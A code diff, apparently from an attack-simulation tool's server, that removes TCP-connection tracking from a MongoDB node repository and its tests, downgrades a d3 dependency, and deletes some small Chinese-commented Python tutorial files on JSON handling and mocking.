updated_node = Node(machine_id=src, connections={dst: frozenset((communication_type,))})
else:
node = Node(**node_dict)
updated_node = MongoNodeRepository._add_connection_to_node(
node, dst, communication_type
)
except UnknownRecordError:
updated_node = Node(machine_id=src, connections={dst: frozenset((communication_type,))})
except Exception as err:
raise StorageError(f"{UPSERT_ERROR_MESSAGE}: {err}")
self._upsert_node(updated_node)
@ -46,19 +50,6 @@ class MongoNodeRepository(INodeRepository):
return new_node
def upsert_tcp_connections(self, machine_id: MachineID, tcp_connections: TCPConnections):
try:
node = self.get_node_by_machine_id(machine_id)
except UnknownRecordError:
node = Node(machine_id=machine_id, connections={})
for target, connections in tcp_connections.items():
if target in node.tcp_connections:
node.tcp_connections[target] = tuple({*node.tcp_connections[target], *connections})
else:
node.tcp_connections[target] = connections
self._upsert_node(node)
def _upsert_node(self, node: Node):
try:
result = self._nodes_collection.replace_one(
@ -67,20 +58,18 @@ class MongoNodeRepository(INodeRepository):
except Exception as err:
raise StorageError(f"{UPSERT_ERROR_MESSAGE}: {err}")
if result.matched_count != 0 and result.modified_count != 1:
raise StorageError(
f'Error updating node with source ID "{node.machine_id}": Expected to update 1 '
f"node, but {result.modified_count} were updated"
)
if result.matched_count == 0 and result.upserted_id is None:
raise StorageError(
f'Error inserting node with source ID "{node.machine_id}": Expected to insert 1 '
f"node, but no nodes were inserted"
)
def get_node_by_machine_id(self, machine_id: MachineID) -> Node:
node_dict = self._nodes_collection.find_one(
{SRC_FIELD_NAME: machine_id}, {MONGO_OBJECT_ID_KEY: False}
)
if not node_dict:
raise UnknownRecordError(f"Node with machine ID {machine_id}")
return Node(**node_dict)
def get_nodes(self) -> Sequence[Node]:
try:
cursor = self._nodes_collection.find({}, {MONGO_OBJECT_ID_KEY: False})

File diff suppressed because it is too large Load Diff

View File

@ -77,7 +77,7 @@
"classnames": "^2.3.1",
"core-js": "^3.18.2",
"crypto-js": "^4.1.1",
"d3": "^7.6.1",
"d3": "^5.14.1",
"downloadjs": "^1.4.7",
"fetch": "^1.1.0",
"file-saver": "^2.0.5",

View File

@ -1,4 +1,3 @@
from copy import deepcopy
from ipaddress import IPv4Address, IPv4Interface
from itertools import count
from unittest.mock import MagicMock
@ -10,7 +9,7 @@ from common import OperatingSystem
from common.agent_events import PingScanEvent, TCPScanEvent
from common.types import PortStatus, SocketAddress
from monkey_island.cc.agent_event_handlers import ScanEventHandler
from monkey_island.cc.models import Agent, CommunicationType, Machine, Node
from monkey_island.cc.models import Agent, CommunicationType, Machine
from monkey_island.cc.repository import (
IAgentRepository,
IMachineRepository,
@ -30,60 +29,43 @@ SOURCE_MACHINE = Machine(
hardware_id=5,
network_interfaces=[IPv4Interface("10.10.10.99/24")],
)
TARGET_MACHINE_ID = 33
TARGET_MACHINE_IP = "10.10.10.1"
TARGET_MACHINE = Machine(
id=TARGET_MACHINE_ID,
id=33,
hardware_id=9,
network_interfaces=[IPv4Interface(f"{TARGET_MACHINE_IP}/24")],
)
SOURCE_NODE = Node(
machine_id=SOURCE_MACHINE.id,
connections=[],
tcp_connections={
44: (SocketAddress(ip="1.1.1.1", port=40), SocketAddress(ip="2.2.2.2", port=50))
},
network_interfaces=[IPv4Interface("10.10.10.1/24")],
)
PING_SCAN_EVENT = PingScanEvent(
source=AGENT_ID,
target=IPv4Address(TARGET_MACHINE_IP),
target=IPv4Address("10.10.10.1"),
response_received=True,
os=OperatingSystem.LINUX,
)
PING_SCAN_EVENT_NO_RESPONSE = PingScanEvent(
source=AGENT_ID,
target=IPv4Address(TARGET_MACHINE_IP),
target=IPv4Address("10.10.10.1"),
response_received=False,
os=OperatingSystem.LINUX,
)
PING_SCAN_EVENT_NO_OS = PingScanEvent(
source=AGENT_ID,
target=IPv4Address(TARGET_MACHINE_IP),
target=IPv4Address("10.10.10.1"),
response_received=True,
os=None,
)
TCP_SCAN_EVENT = TCPScanEvent(
source=AGENT_ID,
target=IPv4Address(TARGET_MACHINE_IP),
ports={22: PortStatus.OPEN, 80: PortStatus.OPEN, 8080: PortStatus.CLOSED},
target=IPv4Address("10.10.10.1"),
ports={22: PortStatus.OPEN, 8080: PortStatus.CLOSED},
)
TCP_CONNECTIONS = {
TARGET_MACHINE_ID: (
SocketAddress(ip=TARGET_MACHINE_IP, port=22),
SocketAddress(ip=TARGET_MACHINE_IP, port=80),
)
}
TCP_SCAN_EVENT_CLOSED = TCPScanEvent(
source=AGENT_ID,
target=IPv4Address(TARGET_MACHINE_IP),
target=IPv4Address("10.10.10.1"),
ports={145: PortStatus.CLOSED, 8080: PortStatus.CLOSED},
)
@ -109,8 +91,6 @@ def machine_repository() -> IMachineRepository:
@pytest.fixture
def node_repository() -> INodeRepository:
node_repository = MagicMock(spec=INodeRepository)
node_repository.get_nodes.return_value = [deepcopy(SOURCE_NODE)]
node_repository.upsert_node = MagicMock()
node_repository.upsert_communication = MagicMock()
return node_repository
@ -123,7 +103,7 @@ def scan_event_handler(agent_repository, machine_repository, node_repository):
MACHINES_BY_ID = {MACHINE_ID: SOURCE_MACHINE, TARGET_MACHINE.id: TARGET_MACHINE}
MACHINES_BY_IP = {
IPv4Address("10.10.10.99"): [SOURCE_MACHINE],
IPv4Address(TARGET_MACHINE_IP): [TARGET_MACHINE],
IPv4Address("10.10.10.1"): [TARGET_MACHINE],
}
@ -206,44 +186,6 @@ def test_tcp_scan_event_target_machine_not_exists(
machine_repository.upsert_machine.assert_called_with(expected_machine)
def test_handle_tcp_scan_event__no_open_ports(
scan_event_handler, machine_repository, node_repository
):
event = TCP_SCAN_EVENT_CLOSED
scan_event_handler._update_nodes = MagicMock()
scan_event_handler.handle_tcp_scan_event(event)
assert not node_repository.upsert_tcp_connections.called
def test_handle_tcp_scan_event__ports_found(
scan_event_handler, machine_repository, node_repository
):
event = TCP_SCAN_EVENT
scan_event_handler._update_nodes = MagicMock()
node_repository.get_node_by_machine_id.return_value = SOURCE_NODE
scan_event_handler.handle_tcp_scan_event(event)
call_args = node_repository.upsert_tcp_connections.call_args[0]
assert call_args[0] == MACHINE_ID
assert TARGET_MACHINE_ID in call_args[1]
open_socket_addresses = call_args[1][TARGET_MACHINE_ID]
assert set(open_socket_addresses) == set(TCP_CONNECTIONS[TARGET_MACHINE_ID])
assert len(open_socket_addresses) == len(TCP_CONNECTIONS[TARGET_MACHINE_ID])
def test_handle_tcp_scan_event__no_source(
caplog, scan_event_handler, machine_repository, node_repository
):
event = TCP_SCAN_EVENT
node_repository.get_node_by_machine_id = MagicMock(side_effect=UnknownRecordError("no source"))
scan_event_handler._update_nodes = MagicMock()
scan_event_handler.handle_tcp_scan_event(event)
assert "ERROR" in caplog.text
assert "no source" in caplog.text
@pytest.mark.parametrize(
"event,handler",
[(PING_SCAN_EVENT, HANDLE_PING_SCAN_METHOD), (TCP_SCAN_EVENT, HANDLE_TCP_SCAN_METHOD)],

View File

@ -3,7 +3,6 @@ from unittest.mock import MagicMock
import mongomock
import pytest
from common.types import SocketAddress
from monkey_island.cc.models import CommunicationType, Node
from monkey_island.cc.repository import (
INodeRepository,
@ -11,17 +10,8 @@ from monkey_island.cc.repository import (
RemovalError,
RetrievalError,
StorageError,
UnknownRecordError,
)
TARGET_MACHINE_IP = "2.2.2.2"
TCP_CONNECTION_PORT_22 = {3: (SocketAddress(ip=TARGET_MACHINE_IP, port=22),)}
TCP_CONNECTION_PORT_80 = {3: (SocketAddress(ip=TARGET_MACHINE_IP, port=80),)}
ALL_TCP_CONNECTIONS = {
3: (SocketAddress(ip=TARGET_MACHINE_IP, port=22), SocketAddress(ip=TARGET_MACHINE_IP, port=80))
}
NODES = (
Node(
machine_id=1,
@ -33,7 +23,6 @@ NODES = (
Node(
machine_id=2,
connections={1: frozenset((CommunicationType.CC,))},
tcp_connections=TCP_CONNECTION_PORT_22,
),
Node(
machine_id=3,
@ -43,7 +32,10 @@ NODES = (
5: frozenset((CommunicationType.SCANNED, CommunicationType.EXPLOITED)),
},
),
Node(machine_id=4, connections={}, tcp_connections=ALL_TCP_CONNECTIONS),
Node(
machine_id=4,
connections={},
),
Node(
machine_id=5,
connections={
@ -171,6 +163,21 @@ def test_upsert_communication__replace_one_fails(
error_raising_node_repository.upsert_communication(1, 2, CommunicationType.SCANNED)
def test_upsert_communication__replace_one_matched_without_modify(
error_raising_mock_mongo_client, error_raising_node_repository
):
mock_result = MagicMock()
mock_result.matched_count = 1
mock_result.modified_count = 0
error_raising_mock_mongo_client.monkey_island.nodes.find_one = MagicMock(return_value=None)
error_raising_mock_mongo_client.monkey_island.nodes.replace_one = MagicMock(
return_value=mock_result
)
with pytest.raises(StorageError):
error_raising_node_repository.upsert_communication(1, 2, CommunicationType.SCANNED)
def test_upsert_communication__replace_one_insert_fails(
error_raising_mock_mongo_client, error_raising_node_repository
):
@ -209,43 +216,3 @@ def test_reset(node_repository):
def test_reset__removal_error(error_raising_node_repository):
with pytest.raises(RemovalError):
error_raising_node_repository.reset()
def test_upsert_tcp_connections__empty_connections(node_repository):
node_repository.upsert_tcp_connections(1, TCP_CONNECTION_PORT_22)
nodes = node_repository.get_nodes()
for node in nodes:
if node.machine_id == 1:
assert node.tcp_connections == TCP_CONNECTION_PORT_22
def test_upsert_tcp_connections__upsert_new_port(node_repository):
node_repository.upsert_tcp_connections(2, TCP_CONNECTION_PORT_80)
nodes = node_repository.get_nodes()
modified_node = [node for node in nodes if node.machine_id == 2][0]
assert set(modified_node.tcp_connections) == set(ALL_TCP_CONNECTIONS)
assert len(modified_node.tcp_connections) == len(ALL_TCP_CONNECTIONS)
def test_upsert_tcp_connections__port_already_present(node_repository):
node_repository.upsert_tcp_connections(4, TCP_CONNECTION_PORT_80)
nodes = node_repository.get_nodes()
modified_node = [node for node in nodes if node.machine_id == 4][0]
assert set(modified_node.tcp_connections) == set(ALL_TCP_CONNECTIONS)
assert len(modified_node.tcp_connections) == len(ALL_TCP_CONNECTIONS)
def test_upsert_tcp_connections__node_missing(node_repository):
node_repository.upsert_tcp_connections(999, TCP_CONNECTION_PORT_80)
nodes = node_repository.get_nodes()
modified_node = [node for node in nodes if node.machine_id == 999][0]
assert set(modified_node.tcp_connections) == set(TCP_CONNECTION_PORT_80)
def test_get_node_by_machine_id(node_repository):
assert node_repository.get_node_by_machine_id(1) == NODES[0]
def test_get_node_by_machine_id__no_node(node_repository):
with pytest.raises(UnknownRecordError):
node_repository.get_node_by_machine_id(999)

View File

@ -1,13 +0,0 @@
import json
data = {
'name' : 'myname',
'age' : 100,
}
# separators:是分隔符的意思参数意思分别为不同dict项之间的分隔符和dict项内key和value之间的分隔符后面的空格都除去了.
# dumps 将python对象字典转换为json字符串
json_str = json.dumps(data, separators=(',', ':'))
print(type(json_str), json_str)
# loads 将json字符串转化为python对象字典
pyton_obj = json.loads(json_str)
print(type(pyton_obj), pyton_obj)

View File

@ -1,13 +0,0 @@
import json
data = {
'name' : 'myname',
'age' : 100,
}
# separators:是分隔符的意思参数意思分别为不同dict项之间的分隔符和dict项内key和value之间的分隔符后面的空格都除去了.
# dumps 将python对象字典转换为json字符串
json_str = json.dumps(data, separators=(',', ':'))
print(type(json_str), json_str)
# loads 将json字符串转化为python对象字典
pyton_obj = json.loads(json_str)
print(type(pyton_obj), pyton_obj)

View File

@ -1,21 +0,0 @@
import unittest
from mock import Mock
def VerifyPhone():
'''
校验用户手机号
'''
pass
class TestVerifyPhone(unittest.TestCase):
def test_verify_phone(self):
data = {"code": "0000", "msg": {"result": "success", "phoneinfo": "移动用户"}}
VerifyPhone = Mock(return_value=data)
self.assertEqual("success", VerifyPhone()["msg"]["result"])
print('测试用例')
if __name__ == '__main__':
unittest.main(verbosity=2)

View File

@ -1,21 +0,0 @@
import unittest
from mock import Mock
def VerifyPhone():
'''
校验用户手机号
'''
pass
class TestVerifyPhone(unittest.TestCase):
def test_verify_phone(self):
data = {"code": "0000", "msg": {"result": "success", "phoneinfo": "移动用户"}}
VerifyPhone = Mock(return_value=data)
self.assertEqual("success", VerifyPhone()["msg"]["result"])
print('测试用例')
if __name__ == '__main__':
unittest.main(verbosity=2)

View File

@ -1,21 +0,0 @@
import unittest
from mock import Mock
def VerifyPhone():
'''
校验用户手机号
'''
pass
class TestVerifyPhone(unittest.TestCase):
def test_verify_phone(self):
data = {"code": "0000", "msg": {"result": "success", "phoneinfo": "移动用户"}}
VerifyPhone = Mock(return_value=data)
self.assertEqual("success", VerifyPhone()["msg"]["result"])
print('测试用例')
if __name__ == '__main__':
unittest.main(verbosity=2)